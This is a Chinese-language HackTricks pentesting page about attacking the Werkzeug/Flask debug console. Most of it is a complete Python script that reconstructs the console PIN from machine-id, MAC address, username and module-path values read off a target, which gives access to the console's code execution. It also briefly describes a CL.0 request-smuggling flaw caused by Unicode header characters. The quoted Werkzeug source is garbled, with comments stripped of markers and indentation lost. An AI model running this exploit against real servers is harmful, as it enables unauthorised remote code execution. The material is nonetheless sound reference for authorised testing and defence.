Werkzeug / Flask Debug

支持 HackTricks 的其他方式：

• 如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版的 HackTricks，请查看订阅计划!

• 获取官方 PEASS & HackTricks 商品

• 探索PEASS 家族，我们的独家NFTs

• 加入 💬 Discord 群组 或 电报群组 或在 Twitter 🐦 @carlospolopm** 上关注我们**。

• 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。

```python def get_machine_id() -> t.Optional[t.Union[str, bytes]]: global _machine_id

if _machine_id is not None: return _machine_id

def _generate() -> t.Optional[t.Union[str, bytes]]: linux = b""

machine-id is stable across boots, boot_id is not.

for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": try: with open(filename, "rb") as f: value = f.readline().strip() except OSError: continue

if value: linux += value break

Containers share the same machine id, add some cgroup

information. This is used outside containers too but should be

relatively stable across boots.

try: with open("/proc/self/cgroup", "rb") as f: linux += f.readline().strip().rpartition(b"/")[2] except OSError: pass

if linux: return linux

On OS X, use ioreg to get the computer's serial number.

try:

</details>

在整理所有必要数据后，可以执行利用脚本来生成Werkzeug控制台PIN：

在整理所有必要数据后，可以执行利用脚本来生成Werkzeug控制台PIN。该脚本使用组装的`probably_public_bits`和`private_bits`来创建一个哈希，然后经过进一步处理生成最终的PIN。以下是执行此过程的Python代码：
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)

这个脚本通过对连接的位进行哈希处理，添加特定的盐（cookiesalt 和 pinsalt），并格式化输出来生成 PIN。重要的是要注意，需要准确从目标系统获取 probably_public_bits 和 private_bits 的实际值，以确保生成的 PIN 与 Werkzeug 控制台预期的 PIN 匹配。

如果你使用的是 Werkzeug 的旧版本，尝试将哈希算法更改为 md5，而不是 sha1。

Werkzeug Unicode 字符

正如在这个问题中观察到的，Werkzeug 在头部包含 Unicode 字符时不会关闭请求。正如这篇文章中所解释的，这可能导致 CL.0 请求走私漏洞。

这是因为，在 Werkzeug 中可以发送一些Unicode字符，这会导致服务器中断。然而，如果使用带有头部**Connection: keep-alive的 HTTP 连接，则请求的主体不会被读取，连接仍将保持打开状态，因此请求的主体将被视为下一个 HTTP 请求**。

参考资料

• https://www.daehee.com/werkzeug-console-pin-exploit/

• https://ctftime.org/writeup/17955

• https://github.com/pallets/werkzeug/issues/2833

• https://mizu.re/post/twisty-python

即时提供的漏洞评估和渗透测试设置。从侦察到报告，使用 20 多种工具和功能运行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块，让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。